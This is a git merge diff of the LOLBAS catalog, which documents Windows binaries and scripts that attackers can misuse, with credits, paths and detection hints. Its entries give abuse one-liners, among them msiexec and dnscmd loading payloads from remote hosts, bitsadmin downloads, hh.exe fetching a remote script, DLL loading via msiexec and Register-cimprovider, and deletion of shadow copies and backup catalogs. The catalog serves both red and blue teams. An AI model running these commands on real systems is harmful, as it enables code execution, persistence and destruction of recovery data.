Merge branch 'master' into master

Backlog.txt

@@ -3,9 +3,8 @@ Kd.exe			Debugger
 Certreq.exe		Exfiltrate data
 Dbghost.exe
 Robocopy.exe	Needs examples
-Bitsadmin.exe	bitsadmin.exe  /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
 Vssadmin.exe	vssadmin.exe Delete Shadows /All /Quiet
-notepad.exe		Gui - Download files using Open (A lot of other programs as well)
+notepad.exe		Gui - Download files using Open (A lot of other programs as well) LOLGuiBins?
 wbadmin.exe 	wbadmin delete catalog -quiet
 psexec.exe		Remote execution of code
 java.exe		-agentpath:<dllname_with_dll_extension>  or   -agentlib:<dllname>
@@ -14,5 +13,6 @@ odbcad32.exe	GUI DLL Loading
 WseClientSvc.exe	- https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f
 dvdplay.exe		http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
 http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
-
-
+https://twitter.com/Hexacorn/status/993498264497541120
+https://twitter.com/Hexacorn/status/994000792628719618
+https://github.com/MoooKitty/Code-Execution

LOLBins.md

@@ -1,11 +1,13 @@
 # LOLBins - Living Off The Land Binaries
 Please contribute and do point out errors or resources I have forgotten.
 If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).    
-    
+<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLBin.png" height="150">
    
 # OS BINARIES
 [Atbroker.exe](OSBinaries/Atbroker.md)    
+[Appvlp.exe](OSBinaries/Appvlp.md)    
 [Bash.exe](OSBinaries/Bash.md)    
+[Bitsadmin.exe](OSBinaries/Bitsadmin.md)    
 [Certutil.exe](OSBinaries/Certutil.md)    
 [Cmdkey.exe](OSBinaries/Cmdkey.md)    
 [Cmstp.exe](OSBinaries/Cmstp.md)     
@@ -14,6 +16,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 [Cscript.exe](OSBinaries/Cscript.md)    
 [Dfsvc.exe](OSBinaries/Dfsvc.md)     
 [Diskshadow.exe](OSBinaries/Diskshadow.md)     
+[Dnscmd.exe](OSBinaries/Dnscmd.md)     
 [Esentutl.exe](OSBinaries/Esentutl.md)     
 [Extexport.exe](OSBinaries/Extexport.md)     
 [Extrac32.exe](OSBinaries/Extrac32.md)     
@@ -44,11 +47,10 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 [Presentationhost.exe](OSBinaries/Presentationhost.md)     
 [Print.exe](OSBinaries/Print.md)  
 [Psr.exe](OSBinaries/Psr.md)  
-[Qprocess.exe](OSBinaries/Qprocess.md)     
 [Reg.exe](OSBinaries/Reg.md)    
 [Regedit.exe](OSBinaries/Regedit.md)    
 [Regasm.exe](OSBinaries/Regasm.md)    
-[Regini.exe](OSBinaries/Regini.md)    
+[Register-cimprovider.exe](OSBinaries/Register-cimprovider.md)        
 [Regsvcs.exe](OSBinaries/Regsvcs.md)    
 [Regsvr32.exe](OSBinaries/Regsvr32.md)    
 [Replace.exe](OSBinaries/Replace.md)     
@@ -60,6 +62,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 [Sc.exe](OSBinaries/Sc.md)     
 [Scriptrunner.exe](OSBinaries/Scriptrunner.md)     
 [Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)     
+[Wab.exe](OSBinaries/Wab.md)     
 [Wmic.exe](OSBinaries/Wmic.md)     
 [Wscript.exe](OSBinaries/Wscript.md)    
 [Xwizard.exe](OSBinaries/Xwizard.md)     
@@ -72,18 +75,20 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 [Cdb.exe](OtherMSBinaries/Cdb.md)    
 [Csi.exe](OtherMSBinaries/Csi.md)    
 [Dnx.exe](OtherMSBinaries/Dnx.md)   
+[Dxcap.exe](OtherMSBinaries/Dxcap.md)   
 [Mftrace.exe](OtherMSBinaries/Mftrace.md)     
 [Msxsl.exe](OtherMSBinaries/Msxsl.md)    
 [Rcsi.exe](OtherMSBinaries/Rcsi.md)     
 [Sqldumper.exe](OtherMSBinaries/Sqldumper.md)     
 [Sqlps.exe](OtherMSBinaries/Sqlps.md)  
-[SQLToolsPS.exe](OtherMSBinaries/SQLToolsPS.md)   
+[Sqltoolsps.exe](OtherMSBinaries/Sqltoolsps.md)   
 [Te.exe](OtherMSBinaries/Te.md)     
 [Tracker.exe](OtherMSBinaries/Tracker.md)  
 [Vsjitdebugger.exe](OtherMSBinaries/Vsjitdebugger.md)  
 [Winword.exe](OtherMSBinaries/Winword.md)    
 
 
+
 # OTHER NON MICROSOFT BINARIES
 [Nvuhda6.exe](OtherBinaries/Nvuhda6.md)     
 [Nvudisp.exe](OtherBinaries/Nvudisp.md)    

LOLLibs.md

@@ -1,7 +1,7 @@
 # LOLLibs - Living Off The Land Libraries
 Please contribute and do point out errors or resources I have forgotten.
 If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).    
-    
+<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLLib.png" height="150">
    
 # OS LIBRARIES
 [Advpack.dll](OSLibraries/Advpack.md)    

LOLScripts.md

@@ -1,14 +1,23 @@
 # LOLScripts - Living Off The Land Scripts
 Please contribute and do point out errors or resources I have forgotten.
 If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).    
-
+<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLScript.png" height="150">
 
 # OS SCRIPTS
-
 [Cl_invocation.ps1](OSScrits/Cl_invocation.md)       
 [CL_mutexverifiers.ps1](OSScripts/CL_mutexverifiers.md)       
 [Manage-bde.vbs](OSScripts/Manage-bde.md)     
+[pester.bat](OSScripts/pester.md)     
 [Pubprn.vbs](OSScripts/Pubprn.md)     
 [Slmgr.vbs](OSScripts/Slmgr.md)      
 [Syncappvpublishingserver.vbs](OSScripts/Syncappvpublishingserver.md)    
 [Winrm.vbs](OSScripts/Winrm.md)      
+
+
+
+# OTHER MICROSOFT SIGNED SCRIPTS
+
+
+
+# OTHER NON MICROSOFT BINARIES
+[Testxlst.js](OtherScripts/Testxlst.md)      

OSBinaries/Appvlp.md

@@ -0,0 +1,35 @@
+## Appvlp.exe
+
+* Functions: Execute
+
+```
+AppVLP.exe \\webdav\calc.bat   
+
+AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe', '', '', 'open', 1)"    
+
+AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"    
+```
+
+Acknowledgements:
+* Will - @moo_hax
+
+Code sample:
+* 
+
+Resources:
+* https://github.com/MoooKitty/Code-Execution
+* https://twitter.com/moo_hax/status/892388990686347264
+
+Full path:
+```
+"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe"
+```
+
+Notes:
+Used by App-V
+
+
+Detection:
+Appvlp.exe spawning other process
+
+ 

OSBinaries/Bitsadmin.md

@@ -0,0 +1,47 @@
+## Bitsadmin.exe
+
+* Functions: Execute, Download, Copy, Read ADS
+
+```
+bitsadmin /create 1   
+bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe    
+bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL    
+bitsadmin /RESUME 1   
+bitsadmin /complete 1
+
+bitsadmin /create 1   
+bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe   
+bitsadmin /RESUME 1   
+bitsadmin /complete 1   
+
+
+bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset    
+
+bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset   
+```
+
+Acknowledgements:
+* Rob Fuller - @mubix 
+* Chris Gates - @carnal0wnage
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* 
+
+Resources:
+* https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Slide 53
+* https://www.youtube.com/watch?v=_8xJaaQlpBo
+* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+
+Full path:
+```
+c:\windows\system32\bitsadmin.exe
+c:\windows\sysWOW64\bitsadmin.exe
+```
+
+Notes:
+
+
+Detection:
+
+ 

OSBinaries/Dnscmd.md

@@ -0,0 +1,37 @@
+## Dnscmd.exe
+
+* Functions: Execute
+
+```
+dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
+```
+
+Acknowledgements:
+* Shay Ber - ?   
+* Dimitrios Slamaris - @dim0x69    
+* Nikhil SamratAshok Mittal - @nikhil_mitt   
+
+Code sample:
+* 
+
+Resources:
+* https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
+* https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
+* https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
+* https://twitter.com/Hexacorn/status/994000792628719618
+* http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
+
+Full path:
+```
+c:\windows\system32\Dnscmd.exe
+c:\windows\sysWOW64\Dnscmd.exe
+```
+
+Notes:
+Used on Windows servers for DNS management
+
+
+Detection:
+
+
+ 

OSBinaries/Extrac32.md

@@ -1,15 +1,18 @@
 ## Extrac32.exe
 
-* Functions: Add ADS
+* Functions: Add ADS, Download
 
 ```
 extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe    
 
 extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe    
+
+extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt   
 ```
 
 Acknowledgements:
 * Oddvar Moe - @oddvarmoe
+* egre55 - @egre55
 
 Code sample:
 * 
@@ -17,6 +20,7 @@ Code sample:
 Resources:
 * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
 * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+* https://twitter.com/egre55/status/985994639202283520
 
 Full path:
 ```

OSBinaries/Hh.md

@@ -1,11 +1,15 @@
 ## hh.exe
 
-* Functions: Open Explorer
+* Functions: Download, Execute
 
 ```
 HH.exe http://www.google.com      
 
 HH.exe C:\    
+
+HH.exe c:\windows\system32\calc.exe    
+
+HH.exe http://some.url/script.ps1    
 ```
 
 Acknowledgements:

OSBinaries/Msiexec.md

@@ -3,18 +3,25 @@
 * Functions: Execute
 
 ```
-msiexec /quiet /i cmd.msi
-msiexec /q /i http://192.168.100.3/tmp/cmd.png
+msiexec /quiet /i cmd.msi    
+
+msiexec /q /i http://192.168.100.3/tmp/cmd.png   
+
+msiexec /y "C:\folder\evil.dll"   
+
+msiexec /z "C:\folder\evil.dll"   
 ```
 
 Acknowledgements:
 * ? - @netbiosX
+* PhilipTsukerman - @PhilipTsukerman
 
 Code sample:
 * 
 
 Resources:
 * https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
+* https://twitter.com/PhilipTsukerman/status/992021361106268161
 
 Full path:
 ```

OSBinaries/Qprocess.md

@@ -1,31 +0,0 @@
-## Qprocess.exe
-
-* Functions: Credentials
-
-```
-qprocess /SERVER:RemoteServer
-```
-
-Acknowledgements:
-* Rahmat Nurfauzi - @infosecn1nja    
-
-Code sample:
-*    
-
-Resources:
-* https://twitter.com/infosecn1nja/status/987268926139592706
-
-Full path:
-```
-c:\windows\system32\Qprocess.exe
-```
-
-Notes:
-Some specific details about the binary file.
-
-
-Detection:
-Details about detection.
-IOC, Behaviour , User Agents etc
-
- 

OSBinaries/Regini.md

@@ -1,30 +0,0 @@
-## Regini.exe
-
-* Functions: Credentials
-
-```
-regini -m \\RemoteServer Example
-```
-
-Acknowledgements:
-* Osanda Malith - @OsandaMalith
-
-Code sample:
-* 
-
-Resources:
-* https://twitter.com/OsandaMalith/status/987823644402372608    
-* https://ss64.com/nt/regini.html    
-
-Full path:
-```
-c:\windows\system32\regini.exe
-c:\windows\sysWOW64\regini.exe
-```
-
-Notes:
-Can also be used to add registry keys
-
-Detection:
-
- 

OSBinaries/Register-cimprovider.md

@@ -0,0 +1,30 @@
+## Register-cimprovider.exe
+
+* Functions: Execute
+
+```
+Register-cimprovider -path "C:\folder\evil.dll"   
+```
+
+Acknowledgements:
+* PhilipTsukerman - @PhilipTsukerman
+
+Code sample:
+* 
+
+Resources:
+* https://twitter.com/PhilipTsukerman/status/992021361106268161
+
+Full path:
+```
+c:\windows\system32\Register-cimprovider.exe
+c:\windows\sysWOW64\Register-cimprovider.exe
+```
+
+Notes:
+
+
+
+Detection:
+
+ 

OSBinaries/Scriptrunner.md

@@ -3,7 +3,9 @@
 * Functions: Execute
 
 ```
-Scriptrunner.exe -appvscript calc.exe
+Scriptrunner.exe -appvscript calc.exe   
+
+ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"   
 ```
 
 Acknowledgements:
@@ -15,6 +17,7 @@ Code sample:
 Resources:
 * https://twitter.com/KyleHanslovan/status/914800377580503040
 * https://twitter.com/NickTyrer/status/914234924655312896
+* https://github.com/MoooKitty/Code-Execution
 
 Full path:
 ```

OSBinaries/Wab.md

@@ -0,0 +1,38 @@
+## Wab.exe
+
+* Functions: Execute
+
+```
+Wab.exe (requires registry changes)
+```
+
+Acknowledgements:
+* Adam - @Hexacorn
+
+Code sample:
+* 
+
+Resources:
+* http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
+* https://twitter.com/Hexacorn/status/991447379864932352
+
+Full path:
+```
+C:\Program Files\Windows Mail\wab.exe    
+C:\Program Files (x86)\Windows Mail\wab.exe    
+```
+
+Notes:
+Searches for wab.dll. Can be manipulated with the following registry key:
+```
+HKLM\Software\Microsoft\WAB\DLLPath
+```
+
+Binary is used to manage Windows contacts/wab files. (Legacy)
+
+
+Detection:
+Look for registry changes to HKLM\Software\Microsoft\WAB\DLLPath
+
+
+ 

OSScripts/pester.md

@@ -0,0 +1,107 @@
+## pester.bat
+
+* Functions: Execute
+
+```
+# Execute notepad
+Pester.bat /help "$null; notepad"
+# Execute calc
+Pester.bat /help "$null; calc"
+# Execute Get-Process cmdlet
+Pester.bat /help "$null; ps"
+
+# Other options for 2nd parameter
+pester.bat help "$null; notepad"
+pester.bat /help "$null; notepad"
+pester.bat ? "$null; notepad"
+pester.bat -? "$null; notepad"
+pester.bat /? "$null; notepad"
+
+# 3rd parameter can be anything
+pester.bat /help "'doesnotexist'; notepad"
+pester.bat /help "Get-Help; notepad"
+pester.bat /help "gcm;notepad"
+
+# 4th parameter is the payload
+
+```
+
+Acknowledgements:
+* Emin Atac - @p0w3rsh3ll
+
+Code sample:
+None
+
+Resources:
+None
+
+Full path:
+```powershell
+# Shipped inbox
+"c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat"   
+
+# There can be other versions present as well
+Dir "c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat"
+```
+
+Notes: This file is digitally signed by a Microsoft certificate
+```powershell
+
+ Get-FileHash "C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat"
+
+
+Algorithm       Hash                                                                   Path
+---------       ----                                                                   ----
+SHA256          EB83A9D837CFE2F409CA3839B017E307A7A65782CB6A0AE0C50731C244DAD40E       C:\Program Files\WindowsPower...
+
+
+Get-AuthenticodeSignature "C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" | fl
+
+
+SignerCertificate      : [Subject]
+                           CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
+
+                         [Issuer]
+                           CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington,
+                         C=US
+
+                         [Serial Number]
+                           33000001733031072665B8B9B3000000000173
+
+                         [Not Before]
+                           11/08/2017 22:23:35
+
+                         [Not After]
+                           11/08/2018 22:23:35
+
+                         [Thumbprint]
+                           14590DC5C3AAF238FCFD7785B4B93F4071402C34
+
+TimeStamperCertificate : [Subject]
+                           CN=Microsoft Time-Stamp Service, OU=nCipher DSE ESN:12E7-3064-6112, OU=AOC, O=Microsoft
+                         Corporation, L=Redmond, S=Washington, C=US
+
+                         [Issuer]
+                           CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
+
+                         [Serial Number]
+                           33000000AC8A21BC7AD29B72F40000000000AC
+
+                         [Not Before]
+                           07/09/2016 19:56:54
+
+                         [Not After]
+                           07/09/2018 19:56:54
+
+                         [Thumbprint]
+                           3970258B14C879DD5F0C5DE98B9CB39499F71CB7
+
+Status                 : Valid
+StatusMessage          : Signature verified.
+Path                   : C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
+SignatureType          : Catalog
+IsOSBinary             : True
+```
+
+
+ 

OtherMSBinaries/Dxcap.md

@@ -0,0 +1,31 @@
+## Dxcap.exe
+
+* Functions: Execute
+
+```
+Dxcap.exe -c C:\Windows\System32\notepad.exe    
+```
+
+Acknowledgements:
+* Matt harr0ey - @harr0ey
+
+Code sample:
+* 
+
+Resources:
+* https://twitter.com/harr0ey/status/992008180904419328
+
+Full path:
+```
+?
+```
+
+Notes:
+This file is a part of Visual studio.
+https://msdn.microsoft.com/en-us/library/dn774939.aspx
+
+
+Detection:
+
+
+ 

OtherMSBinaries/Sqldumper.md

@@ -21,11 +21,13 @@ Resources:
 
 Full path:
 ```
-C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
+C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe   
+
+C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe   
 ```
 
 Notes:
-
+Part of SQL server, but also Office in some versions.
 
 
  

OtherScripts/Testxlst.md

@@ -0,0 +1,32 @@
+## testxlst.js
+
+* Functions: Execute
+
+```
+cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out    
+
+wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out    
+```
+
+Acknowledgements:
+* Jimmy - @bohops
+
+Code sample:
+* 
+
+Resources:
+* https://twitter.com/bohops/status/993314069116485632
+
+Full path:
+```
+c:\python27amd64\Lib\site-packages\win32com\test   
+```
+
+Notes:
+Part of Pywin32
+https://github.com/mhammond/pywin32    
+
+Detection:
+
+
+ 

README.md

@@ -1,16 +1,81 @@
-# Living Off The Land Binaries and Scripts
+# Living Off The Land Binaries and Scripts (and now also Libraries)
 
-There are three different lists.
+<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLBAS.png" height="250">
+
+
+There are currently three different lists.
 
 * [LOLBins](LOLBins.md)    
 * [LOLLibs](LOLLibs.md)    
 * [LOLScripts](LOLScripts.md)    
 
 
-The goal of these lists are to document every binary and script that can be used for other purposes than they are designed to. 
-Every binary and script has it's own .md file in the subfolders. That way I should be easier to maintain and reuse. 
+The goal of these lists are to document every binary, script and library that can be used for Living Off The Land techniques. 
+
+Definition of LOLBAS candidates (Binaries,scripts and libraries):
+* LOLBAS candidates must be present on the system by default or introduced by application/software "installation" from a "reputable" vendor or open-source entity. Otherwise, LOLBAS determination is subject to scrutiny by the (security) community and agreed upon standards.
+* Can be used as an attacker tool directly or can perform other actions than what it was intended to do (Ex: regsvr32 - execute code from SCT online)
+  * executing code
+  * downloading/upload files
+  * bypass UAC
+  * compile code
+  * getting creds/dumping process
+  * surveillance (keylogger, network trace)
+  * evade logging/remove log entry
+  * side-loading/hijacking of DLL
+  * pass-through execution of other programs, script (via a LOLBin)
+  * pass-through persistence utilizing existing LOLBin
+  * persistence (Hide data in ADS, execute at logon etc)
+
+Right now it is me that decides if the files are a valid contribution or not. 
+I try my best to conclude with help from others in the InfoSec community and I do not wish to exclude anything. 
+Also, please be patient if it takes some time for your contribution to be added to the list. I am just one guy.   
+
+Every binary, script and library has it's own .md file in the subfolders. That way I should be easier to maintain and reuse. 
 I have borrowed examples from the community (And a lot from Red Canary - Atomic Red Team - Thanks @subtee)
 Would really love if the community could contribute as much as possible. That would make it better for everyone.
 If you think it is hard to make a pull request using github, don't hasitate to send me a tweet and I will add the contribution for you.
 
 
+## STORY
+"Living off the land" was coined by Matt Graeber - @mattifestation <3    
+One of the first "Living Off The Land" talks (That I know of) is this one:
+https://www.youtube.com/watch?v=j-r6UonEkUw   
+
+The term LOLBins came from a twitter discussion on what to call these binaries. It was first proposed by Philip Goh - @MathCasualty here:
+https://twitter.com/MathCasualty/status/969174982579273728
+
+The term LOLScripts came from Jimmy - @bohops: 
+https://twitter.com/bohops/status/984828803120881665
+
+Common hashtags for these files are:
+
+#LOLBin   
+#LOLBins   
+#LOLScript   
+#LOLScripts   
+#LOLLib   
+#LOLLibs   
+
+A "highly scientific poll" was also conducted to agree (69% yes) on the name LOLBins.
+https://twitter.com/Oddvarmoe/status/985432848961343488 
+
+The domain http://lolbins.com has been registered by an unknown individual and redirected it to this project. (Thank you)
+
+The awesome logos in the logo folder was provided by Adam Nadrowski (@_sup_mane) - Thank you so much man! 
+
+Love this logo:   
+<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOL1.png" height="250">
+
+## Future work / Todo list
+- [ ] Better classification system
+	- [ ] Load DLL
+	- [ ] Arbitrary unsigned code execution
+	- [ ] Launch other process
+- [ ] Better contribution template
+- [ ] Provide the project in DB format (sqlite)
+- [ ] Re-factor project (version 2.0) and move it to a dedicated project site (https://github.com/LOLBAS-Project)
+- [ ] Map it to the Mitre Att&ck <3
+- [ ] LOLGuiBins
+- [ ] More list based on classifications
+- [ ] LOLBAS lists for Linux? OSX?